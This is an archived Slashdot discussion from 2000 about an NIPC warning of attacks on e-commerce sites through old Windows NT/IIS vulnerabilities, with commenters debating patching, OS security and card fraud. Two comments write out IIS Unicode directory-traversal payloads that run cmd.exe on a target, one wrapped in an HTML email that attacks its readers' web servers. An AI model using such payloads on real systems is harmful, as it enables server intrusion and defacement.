Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 


Forgot your password?
Close
typodupeerror
×
The Internet

NIPC Warns Of E-Commerce Vulnerabilities 78

Posted by Hemos from the hack-and-slash-attack dept.
SueZVudu writes: "In an announcement yesterday, the National Infrastructure Protection Center said that there has been an increase in hacker activity aimed at US e-commerce sites. They're mainly exploiting three known vulnerabilities in Windows NT systems, but Unix systems have been targeted as well. Basically, they point out the holes in MicroSoft's SQL system and warn that such attacks are on the rise. You can see the story here." There've been a number of stories like this lately -- not just Microsoft, but the number of attacks is continuing to rise, and some people have been talking about more CERT [?] s regarding "super" DDOS [?] attacks.
This discussion has been archived. No new comments can be posted.

NIPC Warns of E-Commerce Vulnerabilities More

NIPC Warns of E-Commerce Vulnerabilities

Comments Filter:

  • standard cc verification is a built-in exploit (Score:3)

    by gempabumi ( 181507 ) on Sunday December 03, 2000 @01:25AM (#585937) Homepage
    Basically, to buy anything on the net, all you need is:

    a) a name
    b) a credit card number
    c) a zip code

    And that's all - your transaction will be authorized. Whoever thought up this system should be awarded with the "I killed e-commerce" trophy.

    I run a free email service in Southeast Asia. Anyway, every once in a while we get complaints from some disgruntled person in the states about how one of our accounts is using their cc number. Generally, when this happens, we check the account, and usually we find a trail of purchases, along with the names and addresses to which the products were sent. We immediately lock the account.

    Then we try to figure out what to do next. Our choices:

    1. Alert the FBI? Un/fortunately the FBI has no jursidiction here. They can't do anything.

    2. Alert the local auithorities? Well, there is _no_ law in this country. None whatsoever, sadly. And in a case like this, which would require some technical intelligence on their part, the local police would get so confused that they would probably throw us in jail. I'm not exaggerating.

    3. Archive the files and wait. Yep.

    An estimated 80% of the cc transactions originating in this country are with stolen cc numbers. So, if you have online cc processing on your site, MAKE SURE you block any requests originating with 202.* Of course, experienced kiddiez can use proxy servers, but you'll cut down the percentage.

    A friend of mine has an online gift shop, and fake orders where sent through his system for weeks. Every request which is _verified_ by the cc authority and later cancelled cost him $5. He tried to notify the bank where the stolen numbers where coming from and got no response - they didn't care. Why should they, they were making $5 on every fraudulent transaction.

    e-commerce sites are going to get killed by this when more unscrupulous people figure out how easy it is to order goods over the internet. as i said, all it takes is a name, a cc number, and a zip code.
  • Christmas is coming, and crackers seem to be looking to cause as big a stink as possible for online merchants, etc. I dunno, I guess part of the cracker mentality is to cause as much disruption as possible, and Christmas is definately a time in which this is possible. Rumors have been going around for a little while about a huge DDOS attack brewing against popular online merchants. I think it's good that warnings are going out - this holiday season is already been hell on the Internet. Not only does it have to deal with the usual crackers trying to prove how 1337 they are, but we have the increased traffic (at least in the US) caused by America's botched election, and all the people discussing it via email, usenet, web, etc.

    I think it's going to be rough sailing 'til around mid-January.

    - Eric
  • I realize this but much of the internet "security" media hype is about outlook express forwarding e-mail viruses and other dumb stuff like that.

  • linux or windows or whatever OS you use doesn`t make the difference in being secure. It`s the admin who makes the difference.

    Yes, the admin does make a difference. Yes, Linux can be cracked.

    But the OS does make a difference as well. Some OSes are more vulnerable than others. There's a difference in how often vulnerabilities are found.

    The article mentions three different vulnerabilities in Microsoft systems. All three are addressed by security bulletins in the Microsoft websites, so what's the problem? The biggest problem is not the existence of vulnerabilities by themselves, the problem is that Microsoft systems have so many different vulnerabilities that's very hard for a system administrator to keep track of them all. Comparatively, there's much less need of "admin-hours" to keep track and eliminate Unix vulnerabilities.

    Another factor that contributes to this problem is that Microsoft systems are designed to be easy to configure and use by people with minimum training. This means that a Microsoft admin is more likely than a Unix admin to be less than optimally trained for the job. The typical "cracked Linux box" is a home computer connected to a broadband internet connection. These can be dangerous, if they are used for DoS attacks, for instance, but they usually don't have large databases of customer credit card numbers.

    Linux distributors are all working on easier installations, but it still takes a lot more administrator training to set up an e-commerce site on Linux than on MS. So, overall, I would say the security problem mentioned in the article comes both from intrinsic OS problems and insufficiently trained or careless system administrators.

  • Yeah, I know. Lets say that someone did it on one of our client's (I worked as a consultant developing ASP) web sites. I'm just glad it was only a script kiddie, otherwise they could have done some serious damage.
  • It would be nice if the hacker included the fix to the problem in the virus.
    That would make quite an improvement in "hacker ethics".

    Brainstorming mode: the might even be a way to talk yourself out of legal prosecution if you do it this way, since you could claim that these security holes could be used to D(istributed)DoS your system, and you are just fixign them "in hot pursuit" :-P

  • Is it really that hard to patch your system regulary as an Sysadmin?

    As a part-time NT administrator, yes, it is hard to keep up with the patches on NT.

    Service packs are easy to apply, they are not the problem. Someone hands you an unpatched NT box, what do you do? Assuming that you subscribe to the Microsoft Product Security Notification Service, you have to read a huge number of security bulletins. By my count, 60 bulletins from 1999 and 93 bulletins from 2000. For each one of these bulletins, you have to figure out if they are applicable to your system, and if so, download and apply a patch. This is a lot of work and can be confusing. For many NT system administrators, system administration is not their primary job, they are programmers or engineers. The security mailing lists are an even bigger time sink. They are high volume lists with a low signal-to-noise ratio.

  • Whenever I get a security bulletin from M$ and see how big of a problem it is, and how they make it seem so small, "..blah blah blah may permit unauthorized web users to perform priveliged actions.", but they really wanted to say "Using this exploit any web user can run any program on your computer, and smart web users can use it to download your entire database." Also, if these are the security issues they inform the public about, what about the issues they *don't* tell us?
  • Here's an Wired article [wired.com] that discusses the need for stringent security practices on the credit-card company's end of the line as well. It is pretty decently done, so I thought I'd put up a link here.

    --
    "Give him head?" [pdqsolutions.com]

  • Actually, I hate to admin the truth to this one, and I wish I had some moderator points to up this one some.

    What makes this worse though isn't just the MCSE process. It's the age discrimination that does occur to a great degree on 30-35 year old IT workers. You take your most experienced group and disregard them as "too old" or "too expensive" in favor of the more hours-flexible, inexpensive (generally), and inexperienced. Of course we're going to have these problems. This just doesn't happen in most other job arenas.

    Oh well, enough ranting for me, these problems should resolve themselves somewhat when the job market corrects itself to some extent.

  • Not only does it work, but you can send the following as an email and have someone else do whatever you want for you, provided they have an HTML capable mail reader.

    <html>
    <head>
    <title> Thanks for cracking your webserver for me! </title>
    </head>

    <body>
    <IMG SRC="http://www.victimhost.com/scripts/..%c1%9c../ winnt/system32/cmd.exe?/c+cop
    y+..\..\winnt\system32\cmd.exe+cmd1.exe">
    <IMG SRC="http://www.victimhost.com/scripts/..%c1%9c../ inetpub/scripts/cmd1.exe?/c+e
    cho+YOU_ARE_CRACKED+>YOU_ARE_CRACKED&dir&am p;type+YOU_ARE_CRACKED">
    </body>
    </html>

    Of course, this is a bit garbled, but the point is clear.
  • >An estimated 80% of the cc transactions originating >in this country are with stolen cc numbers. So, if >you have online cc processing on your site, MAKE >SURE you block any requests originating with 202.*

    Where IS geographical location)?
    --
    If the good lord had meant me to live in Los Angeles

  • Then you are doing something wrong.

    Any GOOD Apple ][ was hacked to support Applesoft (][+) and a 'cracking rom', one that takes the NMI and re-directs it to your ROM. (normally you take out the casette interface)
  • 1. They're channels, not rooms.

    2. "Run by the geeks"? Oh, so Dalvenjah has stopped his tyranny ("/akill * You all suck", anyone?)

  • I caught a show on TLC once about e-commerce fraud and other computer security issue.

    One guy on the show (some FBI e-security expert) mentionned a very interesting fact: E-commerce is not new. The only thing "new" about it is the fact that you do it from the comfort of your own home.

    He said that most people dont even realize that when they withdraw money off the ATM, or pay at the restaurant via credit or debit card, they're in fact using "e-commerce".
    The only difference being that the banking networks are a bit more private. (Even that is changing, since more and more banks are using VPN's with strong crypto.)

    The other thing worth of mention from that show was that we're only seeing the tip of the iceberg. Banks and other institution involved in e-commerce are reluctant to sound the alarm when it comes to fraud. They dont want to scare the average joe. This helps the criminal, since the other institution are not warned when a new hole arise. If they would sound the alarm loud and fast, everyone else could patch up.



    Summary: It's not any safer to have a clerk swipe you credit card in a machine then to type it yourself on the net. With the technique of skimming, Actually, it's probably safer to type it up yourself on the net. [verifyfraud.com]

  • That's all you need (plus the expiration date, which most e-commerce site's I've been to require) to make a purchase over the phone as well. E-commerce is simply mirroring mail-order.
  • interesting

    (sorry just testing)
  • I'd suggest, you learn to type correctly, otherwise even clueless people will suspect that you don't have any actual knowledge and are just spewing a load of bullshit.
  • An FBI database of IP addresses? I just don't think we'd have freedom of speech any more. Would you speak out against someone in power on the net if you thought they could trace it back to you? How about if you lived in a less democratic country than the US? (which is getting harder by the day)
  • But those days are over; there's no reason someone should be biting their nails after ordering from Amazon.com or CDNow.
    I disagree; shoppers have every reason to be worried after ordering something from Amazon.com Amazon are known and self-admitted to pass confidential customer information to spam-hausen.
    ~cHris

    --
    Chris Naden
    "Sometimes, home is just where you pour your coffee"
  • yeah, well, if 90% of the people are using windows you're gonna hear a lot more about security problems with windows than with some obscure os.

  • Re:Who's casting the first stone? (Score:1)

    by Anonymous Coward
    According to BindView, who discovered the problem, the only OS affected by FINWAIT_1 was Windows. They also mention ME as affected, which is unusual considering ME is supposed to have W2K's TCP/IP stack!

    The versions of Linux they tested were: "General Linux 2.0 kernel-based," Slackware 4.0, and Redhat 6.1 running 2.2.12. Definitely unusual!

    From what I can gather, BindView notified Microsoft of the FINWAIT_1 problem in June and the ESTABLISHED problem in October. As for everyone else, BindView notifed CERT of the ESTABLISHED problem in October and relied on CERT to notify EVERYONE ELSE!!!! The publication date of the advisory from CERT is Novemver 30! The only part I am not *absolutely* sure about is whether BindView notifed Microsoft directly in October--MS has a patch out for 95, 98, 98SE, ME, and NT4 and knowing MS's slow release time(it took them 6 months to fix the FINWAIT_1 problem) I tend to think MS had a headstart! If they did, then this is BULLS**T!!! This speaks volumes for releasing the exploit and notifying the vendor at the same time!
    Congrats to BindView for finding this problem! BOO to BindView for screwing up on the notification! Next time, notify ALL the vendors you know are affected, not just MS!
  • Actually, I think you'll find Microsoft has 90% of desktop PC's which nobody is going to bother cracking. Microsoft have much less that 50% of the server market so you would expect far fewer Windows security attacks, not more.

    To me, this doesn't mean much in terms of who has the best OS but I juts thought I'd put you straight.

    Regards

  • WORD! (Score:3)

    by Otis_INF ( 130595 ) on Sunday December 03, 2000 @02:06AM (#585960) Homepage
    So true... The exploits mentioned in the article are so old and well known, there are patches available for all of them since april this year (some even earlier), if the admins still haven't applied these patches, they don't know what they're doing. I know a few of these admins, in fact they work for big corporations here in Holland, and they say "Well, we have the corporate wide policy to be on patchlevel X (or service pack Y) and all our servers have to be on that level otherwise we get confusion"...

    No that's no joke, but reality. They simply don't understand that if a server is behind a firewall but still connected to the internet, it still can be very vurnerable. So they don't see the need to apply all these patches and configuration settings.

    I did the MCSE course myself a couple of years back, just to get that raise ;) and it's true: if you get the title you think you're AdminGod who knows everything. When you're then sent to a real life situation with servers running all kinds of weird software that affects your work but you don't know that software, you understand how that 16 year old kid must feel, you described perfectly.

    I went back to programming right away... :) Much more fun. ;)
    --

  • Ok i was a lttle bit harsh, maybe.
    I know it is hard to administer a NT system.
    What I wanted to point out is that a lot of people just take secruity too lightly. As you mention a lot of NT-Admins are not able to devote all or a lot of their time to administering.

    Still I think it must be possible for a corp(I guess PHB are most to blame for a lot of this stuff) that relies heavily on their IT Infrastructure to pay someone(or even several people) to look after their servers. A security breach(even worse, a security breach that goes unnoticed, that's the real danger) can destroy a company that relies heavily on the web.
    It didn't want to say administering NT itself is trivial, but rather that system security should be on the priority lists of everybody who relies on their servers and data.
    It is neccesary to educate people that they need to take strong security measures regarding their side just as they have to take care that there are virusscanners on the client machines.

  • What MS needs is a kick up the ass,

    If they did create a auto scripting thingy (thats a scientific term BTW :) it would more than likely be an even bigger security risk than the bugs it would help to fix, just think, allowing an executionable to be automatically ran with a little calling card from microsoft. Thats the sort of thing thats just cries "Take advantage of me"

    Anyways, sorry for the rant
    Da Cr33p

  • No, in fact vulnerabilities were invented by the unix community in the seventies. Microsoft (as usual) just claimed it was new, and took credit for having the first OS with vulnerabilities.

    --

  • > The only machine i administrate that ever got `cracked` was a linux box. OK, I admit it, it wasn`t carefully secured and patched like it should be, but ... well ... if you`re a busy admin you haven`t always got the time to read bugtraq every day, and even if you have, the time to implement the fixes isn`t always availble.

    <clue>
    Forgive my bluntness, but is it really so bad? I run <lamer>RedHat</lamer>, and I find it very easy to stay on top of the worst exploits simply by subscribing to their mailing list. Whenever a patched component is available, I know it immediately simply by spotting the distinctive subject line in my inbox. It takes a few seconds to read the message, a few seconds to type in ncftpget whatever (fewer, if you use the <lamer>Netscape mail client</lamer> like me, and merely have to click the link), and a few seconds more to type rpm -Uhv whatever. If you're a pro, you can show your professionalism by dedicating a few extra minutes to reading up on what has actually been changed.
    </clue>

    Hardly a major challenge. It certainly beats applying a service pack and then trying to fix the resulting trainwreck; at least with Linux patches you can pick and choose your bugs.

    All that to the side, I would say that maintaining system integrity is the primary responsibility of a "busy admin". Spend whatever time it takes to do it right. If your boss wants too many other things that distract from that fundamental responsibility, you should find another job while the economy's still hot.

    --
  • What a wonderful set of links. But they don't bash Unix as much as they bash Linux. Esp. your last link.

    Next time, if you are going to 'pick' on Unix, try using BSD as the basis of your attack. Oh, wait. That means you'd have to WORK to pick on Unix if you use BSD as the example. And your employer Micro$oft is paying you to worry about Linux...not BSD.

    All 6 of your 'examples' are non-issues with BSD.

    ftpd : The version of ftpd shipped with all versions of FreeBSD since 2.2.0 is not vulnerable to this problem
    RPC : FreeBSD is not vulnerable to this problem.
    Proper stack : FreeBSD-For a remote attacker, the scope of the attack is severely limited by the requirement to complete a TCP connection with the victim machine, meaning the IP address of the attacking machine is disclosed, and as such the attack can be effectively responded to through the use of tracing, filtering and legal mechanisms.
    Kerberos : NetBSD-not-for-export "secr" sets are vulnerable to some of the problems cited in the advisory. (ahhh, them dangerous munitions)
    BIND : All versions of FreeBSD after 4.0-RELEASE are not vulnerable to this bug
    Netscape : no BSD mention

  • > I thought Windows was the only OS with vulnerabilities.

    I'm proud to report that my Apple ][ still hasn't been hacked.

    --
  • Microsoft has a security buletin that they send out to inform everyone of the security leaks in Micorsoft products. We received 93 nw buletins and numerous updates this year (3 today...). I don't want to defend Microsoft, but I very much doubt they brag about their security in any other way than relative to prior versions.

    Second: Linux is hardly ever specifically mentioned. Most security problems are application problems, not kernel problems and affect all *nixes. Linux kernel problems are as rare as Windows NT kernel problems.

    Typically Win32 problems are with IIS, LanManager, IE and Office. Recent *nix problems have to do with apache/mysql, samba, bind, bash, ssh, identd etc. The only problems that haunt mostly the Windows OS are the Integration (and Visual Basic) related problems. Apparently that is just too complex to get secure. It's the fact that there is virtually no integration between most *nix applications that saves the *nix community from this *for now*.

    Links: [Microsoft Security] [microsoft.com] [SecurityFocus] [securityfocus.com] [CERT] [cert.org]

    --

  • Yeah, but lots of sites won't ship to addresses besides those that your CC company has on record. I imagine that eventually this will become either legally required or required by all major CC companies. Of course, it doesn't apply to stuff you don't ship, but there are ways to make that more secure too. I don't think it's quite the time to declare the imminent death of web commerce.

    __

  • People blames vulnerabilities in some products, in fact most of the problems may cause by lack of awareness in computer security.

    Businessmen rely on the ecommerce developers to deal with security, but their knowledge in such field may be very questionable.

    Computer security, most likely, is not a mandatory subject of IT graduate, very high chance that a skillful programmer has no knowledge in security.

    What's so bad about it? I've encountered three instances that explains everything:

    1) I suggested to a team of web admins seperate the database system from the web server for security reason. End up I'm considered by them as trouble-maker.

    2) SSH, as we all know, has password and RSA authentication, the latter is supposed to be having higher security level than the former. A person installed both authentication methods because he want to have high security of RSA and convenience of password auth. I asked him, why would a hacker bother to break your RSA while he could take a easy path to break your password authentication?

    3) I tried to explain to my peers that brute force attack is possible so we must set some policies(expiration, length and format of password, etc.) to our password system. They laughed and said brute force attack is a joke because that'd generate a lot of log entry and there are a huge delay in login retry.....

    I could go on. I found that most people do not bother to take to much time on security things but rather rely on the default secuirty of the packages they used. E.g. RedHat has many security holes come with default installation, but since many people thing Linux is secured, then RedHat is secured.

    Just an example, I didn't say RedHat is bad. Many others might be more worse.

  • "super" DDOS attacks (Score:3)

    by FattMattP ( 86246 ) on Sunday December 03, 2000 @07:50AM (#585970) Homepage
    some people have been talking about more CERTs regarding "super" DDOS attacks.
    Yes, these "super" DDOS attacks can bring a site to its knees. The XMAS attack is one of the most devastating, hitting the servers of e-commerce companies from many infected computers around the globe. It seems to only happen only around December 1st through December 25th, then mysteriously stop. These attacks also leave eXtra Masstive Attack Signatures (XMAS) in the form of many hits on a site -- particuarly to resource intensive pages such as online catalog pages -- and sometimes many orders, keeping both credit card verification and product delivery channels clogged for days.

    Something MUST be done about this!

  • Is patching really that hard?

    It's very hard for production system. Patching a NT system is even harder.

    I could explain in detail, but rather I just give you examples.

    I was asked to upgrade the patch from SP3 to SP4, on a Domino Lotus Notes server.

    After the upgrade all users constantly received new message notifications but most were false alarm. We tried to upgrade(and even downgrade) the Domino Lotus Notes server in vain. We could do nothing else but downgrade the patch

    Unfortunately, the system couldn't restart after uninstall the patch. Then we...(I skipped the sad ending here)

    We learn from this story that patching a NT is very destructive, especially we don't know what would be affected after the patch

    To be fair I gave you another story in similar situation caused by apply 'application update'(aka patch, fixes, whatever) to a HP server.

    It's Y2K patch, along with all other 'application update'. I cut the story short, our /var blow up - Downtime - we were blamed.

    However, difference in patching UNIX is that we could actually select a particular fix to apply. In NT we shall install the patch and pray.

    I really wish NT works well. To be honest I am not an anti-Microsoft, but I just wouldn't beg my career on it.

  • e-commerce sites are going to get killed by this when more unscrupulous people figure out how easy it is to order goods over the internet. as i said, all it takes is a name, a cc number, and a zip code.
    That's all it takes when they order via phone, fax, email and snailmail. It's been this way for years. "e-commerce" doesn't make it special, just another avenue to use.

    The entire concept is inherently insecure, whether it's stolen cards or stolen numbers. The problem with stolen numbers is that it can take longer before the cardholder knows it's missing and being used for nefarious purposes.
  • Something MUST be done about this! Make sure your routers and firewalls are properly configured, and all your patches are up to date. As far as using Win2k or NT.....well I wouldn't let them host any sensitive data.

  • We all knew this would happen. (Score:3)

    by treat ( 84622 ) on Sunday December 03, 2000 @12:12AM (#585974)
    Everyone knew that the commercialization of the internet, and bringing millions of people onto it, would cause this to happen.

    Consider the original IRC network, EFnet. It's essentially dead - completely unreliable and virtually impossible to connect to. Because of people DOSing the servers.

    I liked the net a whole lot more when it was just us geeks.


  • I thought Windows was the only OS with vulnerabilities.

    Guess not.

  • Nevermind... I saw the part where it said Although these vulnerabilities are not new, this recent activity warrants additional attention by system administrators.

    next time i'll read the article a bit more carefully

  • Okay, but will this problem ever go away? (Score:3)

    by Green Monkey ( 152750 ) on Sunday December 03, 2000 @12:13AM (#585977)
    We're always hearing about how there's still a problem with security on the Internet, but is this really something to be surprised about? Eliminating illegal cracking completely is just never going to happen. Material goods have been around for thousands of years and we still theft. Why should we expect online transactions to be any different?

    I don't mean to be a pessimist, but it's inevitable that e-commerce will occasionally be subverted. It goes with the territory; we don't live in a perfect world and trying to make sure things always are secure is a waste of programming and marketing time.

    Internet security paranoia has gone on for far too long, mostly because the mass media thrives off creating terrifying hoaxes to show on the 6-o'-clock news. (This in spite of a recent PC Data survey that showed e-commerce transactions are more likely to be legit than mail order ones.) At one time, e-commerce was somewhat insecure and unreliable. But those days are over; there's no reason someone should be biting their nails after ordering from Amazon.com or CDNow. It's time to stop perpetuating the cracker myth and put our efforts into actually building the next-generation e-commerce infrastructure.

  • How appropriate... (Score:3)

    by Johnath ( 85825 ) on Sunday December 03, 2000 @12:20AM (#585978) Homepage
    ... that securityfocus [securityfocus.com] has just recently started up a new mailing list to handle the Secure Programming questions whose lack of answers lead to a lot of these problems. Of course, site admins should keep up on Bugtraq postings for whatever software they use, but it's the secprog list that is discussing the development of safe programming techniques and identification of dangerous constructs.

    To get more information and potentially sign up, click here [securityfocus.com].
  • I can't help but notice a growing trend of problems, and they all seem to be Windows problems...

    And Microsoft preaches on about how secure their software is.

    The last time Linux was mentioned with some sort of security problem in the news was the prolin virus -- another Windows thing. How ironic.

  • Old issue (Score:5)

    by Calle Ballz ( 238584 ) on Sunday December 03, 2000 @12:15AM (#585980) Homepage
    The NIPC is way behind the times. These exploits have been out for a while now, they are nothing new. Just because a certain ammount of sites are getting hit just recently doesn't mean that extra precaution should be made now. The precautions should have been taken a long time ago. Microsoft can put out some pretty secure stuff if the gaping holes like the MDAC vulnerability are closed. They forgot an even bigger IIS vulnerability as well. The new UNICODE vulnerability affects IIS 4.0 and IIS 5.0. It's the easiest vulnerability that I have seen yet. http://target/scripts/..%c0%af../winnt/system32/cm d.exe?/c+dir. Sorry to come off strong, but if people would just pay attention to the resources out there like www.securityfocus.com [securityfocus.com] then articles like these wouldn't be so common.......dick

  • Hello Mr Sysadmin (Score:4)

    by Cmdr. Marille ( 189584 ) on Sunday December 03, 2000 @12:31AM (#585981)
    Is patching really that hard?
    Now unfortunately they don't mention which sites where affected and what the crackers actually did.
    What I find really disturbing is the fact that for all of the 3 exploits(which are rather old) patches or configuration changes were avaiable. So you can bash Microsoft to death here for letting such security holes happen but at least they patched it. The question is wether or not the patches were avaiable before( I mean one of the holes was found in 99!)

    Is it really that hard to patch your system regulary as an Sysadmin? You are responsible for a e-commerce system and you don't fiond the time to patch your system? I guess most people don't even bother to read securityfocus [securtyfocus.com] or a similar ressource or at least the MS security bulletins.

    I guess a lot of corporations still think a security audit is some kinf of luxury and even more don't seem to remembers that it's not done with one check, security is soemthing you have to take care of constantely.
    And what are we going to see?
    People talking about master "hackers". In those cases the measures to close those holes seem pretty trivial(if the patches were avaiable on time, which you can't judge now).
  • You thought it was hard to find venture capital before? Wait til Wallstreet reacts to this.

    Since when is the US Govt experts on Internet Security anyways? Hasn't every .gov site been hacked already (or more than 50% at least). Maybe they should be following their own advice.

    BTW, how long until MS says to the Govt: "You let us operate the way we want and we'll include Carnivore in all of our programs"?

    Bored, must sleep.

  • What MS needs is... (Score:4)

    by Trevor Goodchild ( 187368 ) on Sunday December 03, 2000 @12:35AM (#585983)

    ...a way to patch these holes automatically. Maybe they could develop a scripting language that could be run through an email client and then just mail the patch to everyone for auto-execution.
  • Very recently (although I can't find a link for the life of me) there was a row about a distributed antivirus signature update system. If one node were to get poisoned or trojaned, all hell would break loose.

    I can see that happening with the sort of thing you're thinking of... way bad idea.

    I mean, the only explanation for sysadmins not patching months- (in some cases years-) old holes and bugs are laziness or incompetence. Period. One more automated thing will make it that much easier for chimpanzees to run webservers -- and we don't want that, do we?

    --
    "Give him head?" [pdqsolutions.com]
  • hmm.. for some reason I dont think Slashdot is the only place you can gain fans (especially 5 fans) by toting class superiority.
  • Just because a certain ammount of sites are getting hit just recently doesn't mean that extra precaution should be made now.

    Actually I'd figure that an increase in illicit activity is precisely a call for caution. Unfortunately when it comes to IIS you don't have too many ways to ensure that the patches you have applied have actually fixed the problem or even that you havn't undone the patch by installing a further patch.

  • More exploits == less breakins?
  • werd.. the tag line is truely to my friends who seem to always send me .exe's. Mind you, I honestly wish they would just not send me "funny stuff" at all. Guess that makes me old, thinking that you shouldn't use email for anything you wouldn't use mail or the telephone for.
  • First of all, it is never too much work to apply 153 patches to your one, two or ten e-commerce internet servers. For all other machines, you may consider puting the patches on your local disks on the day they are issued, and link to them from sub-directories named after the affected system(s). Allows for really quick updates.

    Also, the number of patches you need to apply is quite limited if you just apply the latest SP first (12 for Win2k with SP1), and patches are often named after the SP they will appear in. I would say: Piece of cake to keep those systems up-to-date. Only problem remaining is that MS insists on re-booting after every single applied patch. Then again, isn't that why god gave us perl for win32? ;-)

    --

  • Ah, just like the mandatory prison sentence for drugs, theft, robbery, murder, prostitution and illegal gambling put a stop to those.

    Many crackers do it for the kick. Part of the trick is not being caught. People capable of still causing real harm to online traders are amazingly good at that particular trick. Unlike (I imagine) real-life crimes, with online crimes you have an amazing amount of time to prepare properly and set-up your systems.

    About registration, I bet they do... Problem with IPs is: A criminal who does not want to get linked to multiple attacks simply doesn't use the same car twice but just steals new number-plates or or simply steals a car. Same holds for IP addresses. You just get a new one (one?) for every attack or use someone else's, and preferably never use your own.

    --

  • I hope this is all signed. I'd hate to see you being send spoofed mails.
    FP.
  • My favorite thing about M$ SP's have to deal with Site/Commerce Server. There is a document that explains how to, and in which order, to apply patches and install software. Lets just say that when I did it last, I rebooted my computer over 15 times and installed SP3, 4, 6. And no, you can't just install 6 because some of the stuff you install inbetween 3 and 4, 4 and 6 need the "features" that get removed with the later SP. I have great empathy for NT sys admins...
  • I'm not so sure its age discrimination, but perhaps the opposite -- the ranks of IT have swelled so quickly that there has to be somebody to manage them. Anyone who shows up regularly and has an IQ above 7 gets promoted to management just when their experience and skill are starting to become meaningful.

    In this position you're responsible for the bigger picture and the details like bugfix Q1238948 become harder to pay attention to -- you're in meetings, and you're chasing after the scumbags that work for you to get them to do the minimum of the job performance, all the while having to please a higher level of management with even less technology experience than your old boss whose job you now have.

    I think it will take a serious collapse in the economy for the job market alone to correct this. We'll need to see a contraction of IT infrastructure (ie, less stuff to maintain and admin) for this to occur. I'm certainly not sold that a partial collapse of the dotcom world is enough -- plenty of dotcom people I've met are WORSE than standard issue corporate IT. They often strike me as the kinds of people with more interest in a technology lifestyle than in technology itself.

  • >>>If you're a pro, you can show your professionalism by dedicating a few extra minutes to reading up on what has actually been changed.

    I have to dissagree. If your a pro, you don't blindly apply patches to production systems the second you hear/read of their existance. Sane admins like to test the "fixes" on non-critical systems first and make sure the they both work and cause no additional harm. This slows down the process a bit but results in fewer mistakes.

  • Re:Hah! They deserve it! (Score:1)

    by Anonymous Coward
    Yeah, with unix at least you get properly secured tools like And it also allows you to run And best of all, there are hardly ever any security problems [securityfocus.com] reported for it!
  • Yeah right, the usual response is to blame the user. Pthththth-t! You can only take that so far, and you should not ignore the problem underneath. It is possible to make secure software, like OpenBSD.

    All the same things can be said about the people who WRITE that software in the first place. Perma-temps, H1B slaves, and other people forced to work 80 hour weeks are not going to produce the best code in the world. Inexperience can be found where you look for it, but it's more important in Redmond.

    Sure, it's possible to bone up OpenBSD, but they don't make the same kind of prommises that MS does, and that's where these holes are. MS prommises that their software is secure AND that MSCEs can run it in a secure fashion. They need to live up to both.

  • I've been running a profitable ebusiness since late 1995. In the middle of 1996 I stopped, cold, accepting any transaction that did not originate in the US, Great Britain, Germany, Japan or from any computer in the list of open proxies I maintain. There are thousands of proxies on that list and I update it regularly.

    My bottom line improved DRAMATICALLY.

    Some countries, I block, as much as I can, at the router level. Those countries include china, any moslem country, all the russian republics, any country which was once a soviet satellite.

    No way, no how, would I ever do this thing otherwise until credit card companies come up with
    a scheme that guarantees the authenticity of the card holder.

    Ask yourself this: Why does paypal only accept american accounts? Do you think they're stupid?
  • Recently, I tried to purchase some cheap hardware and media from an on-line company in the USA. I live in Canada, quite close to the BC/Washington border. I wanted to ship the product to an address in the USA belonging to my friend, so that I could drive down and pick it up and bring it across the border myself. If it goes through in the mail, the Canadian customs folks will hang on to it about a month and bill me for duty on about three times the cost of the stuff. I kid you not - I was once billed $40 CDN in duty on a $99 purchase.

    Everything goes fine, I confirm my order of about $700. The next day, I get this mailed to the spam-bucket account I use for online transactions:

    We have been unable to process your order because your billing and shipping information did not verify with the bank that issued the credit card you used to place your order.

    As stated on our website, shipping and billing information, if different, must both be on file with the issuing financial institution.

    Now this was a surprise to me because:
    1. I had called my credit card company to ask them to put the address on the card in addition to mine
    2. I had successfully shipped product to Tampa (also not my billing address) in the early summer.
    Apparently new anti-fraud measures have since come into place. I can't make any more orders, unfortunately, and I'll have to do without the hardware I ordered until I get my friend to buy it for me on his card and I pay him back for it.

    Meanwhile, it might be a good idea for those of you who have a problem with online credit card transactions bouncing who also ship physical product to addresses to check with the bank and implement these measures. If there's no way for a person to get your product to them, there is no reason for them to expose themselves to the risk of using the stolen number at your site.
  • Before we all play "jump on Microsoft", have a look at CERT CA-2000-21 [cert.org], posted on Thursday. This is a great DoS attack for anyone who controls a bunch of slave machines: fully open many TCP connections on the victim's box, then leave them stuck in the ESTABLISHED or FIN WAIT-1 states. This requires minimal traffic and no memory on the attacker's side once the sockets are in the right state. I doubt syncookie-like strategies will take care of the problem, and the TCP keepalive mechanism probably uses intervals too large to do much good against a concerted attack.

    Many systems are vulnerable to this attack. Right now, Linux, the BSD's, and a number of other UNIX flavors appear vulnerable; see the statements from IBM, Compaq, and FreeBSD in the advisory.

    Interestingly, MS says that Win2K is resistant to these attacks by design, though NT 4 has been patched. I wonder how they defend against an attack from multiple machines without refusing new connections or RST'ing the wrong ones? Similar recovery problems have already proven somewhat difficult in the context of handling local memory exhaustion attacks on Linux systems.

  • ... (Score:1)

    by Niac ( 2101 )
    Got root? :P

  • Why are they complaining?? (Score:3)

    by James Foster ( 226728 ) on Sunday December 03, 2000 @12:41AM (#586001)
    If theres increased hacker activity... shouldn't e-commerce sites be happy?? I mean, it's not everyday you get people coming along and improving your site for free. If they had malicious intent (in which case they'd be crackers) then I could understand.
  • yes.. please do keep developing buggy software and while you're at it, why not enact the recent Cyber Crime Treaty and make security analysis and "exploits" illegal. Because when exploits are outlawed only outlaws will have exploits.

  • The real cost of all this... (Score:3)

    by Phaid ( 938 ) on Sunday December 03, 2000 @02:49AM (#586003) Homepage
    A lot of posts on this thread are of the "when will it all end, what can we do about it" nature. And others on the theme of "it was better when it was just us geeks".

    The reason the Internet is such a great tool for communication, and also the reason that it is so easily abused, is that every node on the network is empowered. Everyone is able to send and receive at will, limited by the amount of bandwidth that they have. This is also its weakness, in that the model "trusts" its users not to abuse the system. Originally, when the network was all military and education, this was a reasonably safe assumption.

    But we've seen what happens when everyone trusts everyone else. Someone comes along and abuses that trust - like the Morris worm in 1988. So we try and secure our individual sites, which means that administrators have to be smart and knowledgeable because the nature of the traffic coming to their sites is not predictable. And, as ever, if we can't protect ourselves, someone's going to want to jump in and do it for us.

    My fear is that eventually the business side of the Net - its use as a money making tool - will overtake its other uses. That the "solution" to the problem of hacking and DDOSing will be to limit the traffic that flows through the network. That, essentially, the internet will turn into a giant content-delivery engine with just enough interactivity to allow you to Add Item to your Shopping Cart.

    Of course, the fact that commercial sites use crummy, easily hacked software tends to push in favor of these sorts of limits. Almost makes you wonder if they're doing it on purpose...
